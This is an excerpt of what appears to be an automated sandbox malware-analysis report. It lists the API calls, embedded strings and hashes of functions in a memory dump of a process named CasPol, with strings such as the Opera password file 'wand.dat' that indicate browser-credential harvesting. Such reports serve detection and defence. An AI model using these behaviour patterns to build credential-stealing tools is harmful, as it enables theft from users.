                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4131324427-0
                                                                                                                                                                          • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                                                                                                          • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                                                                                                                          • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                                                                                                          • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetTempPathW.KERNEL32(000000E6,?), ref: 004181DB
                                                                                                                                                                          • GetTempPathA.KERNEL32(000000E6,?), ref: 00418203
                                                                                                                                                                          • free.MSVCRT ref: 0041822B
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: PathTemp$free
                                                                                                                                                                          • String ID: %s\etilqs_$etilqs_
                                                                                                                                                                          • API String ID: 924794160-1420421710
                                                                                                                                                                          • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                                                                                          • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                                                                                                          • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                                                                                          • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                                                                                                          APIs
                                                                                                                                                                          • wcscpy.MSVCRT ref: 0041477F
                                                                                                                                                                          • wcscpy.MSVCRT ref: 0041479A
                                                                                                                                                                          • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000), ref: 004147C1
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: wcscpy$CloseCreateFileHandle
                                                                                                                                                                          • String ID: General
                                                                                                                                                                          • API String ID: 999786162-26480598
                                                                                                                                                                          • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                                                                                                          • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                                                                                                                          • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                                                                                                          • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLastMessage_snwprintf
                                                                                                                                                                          • String ID: Error$Error %d: %s
                                                                                                                                                                          • API String ID: 313946961-1552265934
                                                                                                                                                                          • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                                                                                          • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                                                                                                          • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                                                                                          • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                                                                                                          • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                                                                                                          • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                          • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                          • API String ID: 3510742995-272990098
                                                                                                                                                                          • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                                                          • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                                                                                                          • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                                                          • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                                                                                                          APIs
                                                                                                                                                                          • memset.MSVCRT ref: 0044A6EB
                                                                                                                                                                          • memset.MSVCRT ref: 0044A6FB
                                                                                                                                                                          • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                                                                          • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memcpymemset
                                                                                                                                                                          • String ID: gj
                                                                                                                                                                          • API String ID: 1297977491-4203073231
                                                                                                                                                                          • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                                                                                          • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                                                                                                          • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                                                                                          • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                                                                                                          APIs
                                                                                                                                                                          • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                                                                                                          • malloc.MSVCRT ref: 004174BD
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                                                                                                          • free.MSVCRT ref: 004174E4
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4053608372-0
                                                                                                                                                                          • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                                                                                                          • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                                                                                                          • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                                                                                                          • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetParent.USER32(?), ref: 0040D453
                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                                                                                                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4247780290-0
                                                                                                                                                                          • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                                                          • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                                                                                                          • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                                                          • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                                                                                                          • memset.MSVCRT ref: 004450CD
                                                                                                                                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                                                            • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                                                                                            • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                                                                                            • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                                                                            • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 004450F7
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1471605966-0
                                                                                                                                                                          • Opcode ID: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                                                                                                                                          • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                                                                                                          • Opcode Fuzzy Hash: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                                                                                                                                          • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                                                                                                          APIs
                                                                                                                                                                          • wcscpy.MSVCRT ref: 0044475F
                                                                                                                                                                          • wcscat.MSVCRT ref: 0044476E
                                                                                                                                                                          • wcscat.MSVCRT ref: 0044477F
                                                                                                                                                                          • wcscat.MSVCRT ref: 0044478E
                                                                                                                                                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                            • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                                            • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                                                                                                                                                                            • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                                                                                                          • String ID: \StringFileInfo\
                                                                                                                                                                          • API String ID: 102104167-2245444037
                                                                                                                                                                          • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                                                                                          • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                                                                                                                          • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                                                                                          • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                                                                                                                          APIs
                                                                                                                                                                          • memset.MSVCRT ref: 004100FB
                                                                                                                                                                          • memset.MSVCRT ref: 00410112
                                                                                                                                                                            • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                                                            • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00410141
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                                                                          • String ID: </%s>
                                                                                                                                                                          • API String ID: 3400436232-259020660
                                                                                                                                                                          • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                                                                                          • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                                                                                                          • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                                                                                          • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                                                                                                          APIs
                                                                                                                                                                          • memset.MSVCRT ref: 0040D58D
                                                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                                                                                                          • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                                                                          • String ID: caption
                                                                                                                                                                          • API String ID: 1523050162-4135340389
                                                                                                                                                                          • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                                                                                                          • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                                                                                                                          • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                                                                                                          • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                                                                                                            • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                                                                                                          • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                                                                                                          • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                                                                                                          • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                                                                                          • String ID: MS Sans Serif
                                                                                                                                                                          • API String ID: 210187428-168460110
                                                                                                                                                                          • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                                                                                          • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                                                                                                          • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                                                                                          • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                                                                                                          APIs
                                                                                                                                                                          • memset.MSVCRT ref: 0040560C
                                                                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                            • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                            • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                                            • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                            • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                            • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                                            • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                                          • String ID: *.*$dat$wand.dat
                                                                                                                                                                          • API String ID: 2618321458-1828844352
                                                                                                                                                                          • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                                                                                          • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                                                                                                          • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                                                                                          • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                                                                                                          APIs
                                                                                                                                                                          • memset.MSVCRT ref: 00412057
                                                                                                                                                                            • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                                                                                                          • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                                                                                                          • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3550944819-0
                                                                                                                                                                          • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                                                                          • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                                                                                                          • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                                                                          • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                                                                                                          APIs
                                                                                                                                                                          • free.MSVCRT ref: 0040F561
                                                                                                                                                                          • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                                                                                                                          • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memcpy$free
                                                                                                                                                                          • String ID: g4@
                                                                                                                                                                          • API String ID: 2888793982-2133833424
                                                                                                                                                                          • Opcode ID: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                                                                                                                          • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                                                                                                          • Opcode Fuzzy Hash: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                                                                                                                          • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                                                                                                          APIs
                                                                                                                                                                          • memset.MSVCRT ref: 004144E7
                                                                                                                                                                            • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                                                            • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                                                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                                                                                                          • memset.MSVCRT ref: 0041451A
                                                                                                                                                                          • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1127616056-0
                                                                                                                                                                          • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                                                                                          • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                                                                                                          • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                                                                                          • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                                                                                                          APIs
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,756F18FE,?,0041755F,?), ref: 00417452
                                                                                                                                                                          • malloc.MSVCRT ref: 00417459
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,756F18FE,?,0041755F,?), ref: 00417478
                                                                                                                                                                          • free.MSVCRT ref: 0041747F
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2605342592-0
                                                                                                                                                                          • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                                                                                                          • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                                                                                                                          • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                                                                                                          • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                                                                                                                          • RegisterClassW.USER32(?), ref: 00412428
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                                                                                                          • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2678498856-0
                                                                                                                                                                          • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                                                                                          • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                                                                                                          • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
